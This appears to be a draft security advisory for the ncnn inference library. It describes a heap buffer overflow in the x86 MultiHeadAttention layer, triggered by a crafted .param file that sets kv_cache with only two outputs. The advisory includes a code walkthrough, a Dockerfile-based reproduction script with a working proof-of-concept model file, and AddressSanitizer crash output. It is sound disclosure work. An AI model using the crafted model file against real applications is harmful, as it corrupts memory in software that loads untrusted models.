All advisories
Draft

Heap Buffer Overflow in x86 Multi-Head Attention

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in x86 Multi-Head Attention

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/multiheadattention_x86.cpp:1089 in MultiHeadAttention_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

An x86 MultiHeadAttention layer with 7=1 (kv_cache) but only two declared output blobs makes the forward implementation assign a third ncnn::Mat one element past the end of the top_blobs vector that ncnn allocated from layer->tops.size(). The assignment runs Mat::operator=, whose release() loads a refcount pointer from heap memory 8 bytes beyond the allocation and may atomically decrement it and free the pointer stored next to it. ncnnoptimize reaches the layer while running ModelWriter::shape_inference() on the attacker-supplied .param, as does any application that forwards the model.

Detail

MultiHeadAttention::load_param reads kv_cache = pd.get(7, 0); and nothing validates it against the layer's declared output count. The output vector is sized purely from the graph text at src/net.cpp:855, std::vector<Mat> top_blobs(layer->tops.size());, so a layer line declaring two tops yields a two-element vector regardless of the parameters.

// src/layer/x86/multiheadattention_x86.cpp:1085
    if (kv_cache)
    {
        // assert top_blobs.size() == 3
        top_blobs[1] = k_affine;
        top_blobs[2] = v_affine;
    }

The comment states the requirement the code depends on, but it is only a comment — there is no if (top_blobs.size() < 3) return -1; in the x86 implementation and no rejection of the configuration at load time.

The PoC declares MultiHeadAttention mha 3 2 q cached_k cached_v out cached_out ... 7=1: three inputs, two outputs, kv_cache on. The vector therefore covers 176 bytes (two 88-byte ncnn::Mat objects). top_blobs[1] is in range, but top_blobs[2] = v_affine targets byte 176, past the end. Mat::operator= calls release() on the destination first (src/mat.h:1551), and release() evaluates if (refcount && NCNN_XADD(refcount, -1) == 1), reading the 8-byte refcount field at offset 8 of that element — address 184, the "8 bytes after 176-byte region" ASan reports. Without a sanitizer the value read is whatever heap data follows the vector; a non-null value is decremented in place and, on reaching zero, causes fastFree() on the adjacent data word.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-multi-head-attention && cd ncnn-poc-heap-buffer-overflow-in-x86-multi-head-attention

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
4 5
Input q 0 1 q 0=1
Input cached_k 0 1 cached_k 0=1
Input cached_v 0 1 cached_v 0=1
MultiHeadAttention mha 3 2 q cached_k cached_v out cached_out 0=1 2=1 7=1
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50f0000001e8 at pc 0x603b342973c7 bp 0x7ffca98f9cb0 sp 0x7ffca98f9ca0
READ of size 8 at 0x50f0000001e8 thread T0
    #0 0x603b342973c6 in ncnn::Mat::release() /ncnn/src/mat.h:1583
    #1 0x603b342973c6 in ncnn::Mat::operator=(ncnn::Mat const&) /ncnn/src/mat.h:1551
    #2 0x603b342973c6 in ncnn::MultiHeadAttention_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/multiheadattention_x86_avx512.cpp:1089
    #3 0x603b2bce270b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #4 0x603b2bccab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x603b2bd2a9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x603b2bbbc3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x603b2bc39eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x7344cd0b81c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x7344cd0b828a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x603b2bbb9624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50f0000001e8 is located 8 bytes after 176-byte region [0x50f000000130,0x50f0000001e0)
allocated by thread T0 here:
    #0 0x7344cd733548 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:95
    #1 0x603b2bc4aa99 in std::__new_allocator<ncnn::Mat>::allocate(unsigned long, void const*) /usr/include/c++/13/bits/new_allocator.h:151
    #2 0x603b2bc46522 in std::allocator_traits<std::allocator<ncnn::Mat> >::allocate(std::allocator<ncnn::Mat>&, unsigned long) /usr/include/c++/13/bits/alloc_traits.h:482
    #3 0x603b2bc46522 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_allocate(unsigned long) /usr/include/c++/13/bits/stl_vector.h:381
    #4 0x603b2bd381be in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_M_create_storage(unsigned long) /usr/include/c++/13/bits/stl_vector.h:398
    #5 0x603b2bd34bd4 in std::_Vector_base<ncnn::Mat, std::allocator<ncnn::Mat> >::_Vector_base(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:335
    #6 0x603b2bd331a0 in std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >::vector(unsigned long, std::allocator<ncnn::Mat> const&) /usr/include/c++/13/bits/stl_vector.h:557
    #7 0x603b2bce2670 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:855
    #8 0x603b2bccab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #9 0x603b2bd2a9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #10 0x603b2bbbc3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #11 0x603b2bc39eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #12 0x7344cd0b81c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x7344cd0b828a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #14 0x603b2bbb9624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/mat.h:1583 in ncnn::Mat::release()

Credit

Zheng Yu @ DepthFirst